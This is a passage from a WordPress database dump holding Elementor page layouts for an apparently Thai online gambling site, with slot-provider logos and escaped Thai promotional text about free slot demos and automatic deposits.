0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(774,108,'_thumbnail_id','61'),(777,109,'_elementor_edit_mode','builder'),(778,109,'_elementor_template_type','wp-page'),(779,109,'_elementor_version','3.32.5'),(780,109,'_elementor_pro_version','3.32.3'),(781,109,'_wp_page_template','default'),(782,109,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(783,109,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(784,109,'_thumbnail_id','61'),(791,29,'_elementor_edit_mode','builder'),(792,29,'_elementor_template_type','wp-page'),(793,29,'_elementor_version','3.35.5'),(794,29,'_elementor_pro_version','3.32.3'),(796,110,'_elementor_edit_mode','builder'),(797,110,'_elementor_template_type','wp-page'),(798,110,'_elementor_version','3.32.5'),(799,110,'_elementor_pro_version','3.32.3'),(801,111,'_elementor_edit_mode','builder'),(802,111,'_elementor_template_type','wp-page'),(803,111,'_elementor_version','3.32.5'),(804,111,'_elementor_pro_version','3.32.3'),(805,29,'_wp_page_template','default'),(806,29,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(807,29,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19 AMB18 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e25\\u0e49\\u0e33\\u0e14\\u0e35\\u0e44\\u0e0b\\u0e19\\u0e4c\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e41\\u0e04\\u0e48\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e04\\u0e25\\u0e34\\u0e01\\u0e01\\u0e47\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e23\\u0e49\\u0e2d\\u0e22 \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e40\\u0e25\\u0e34\\u0e1f\\u0e04\\u0e37\\u0e2d\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e08\\u0e30\\u0e40\\u0e15\\u0e34\\u0e21\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e40\\u0e15\\u0e34\\u0e21\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e08\\u0e31\\u0e14\\u0e01\\u0e32\\u0e23\\u0e07\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e41\\u0e04\\u0e48\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e27\\u0e34\\u0e48\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e41\\u0e1a\\u0e1a\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25 \\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e2a\\u0e39\\u0e07 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e35 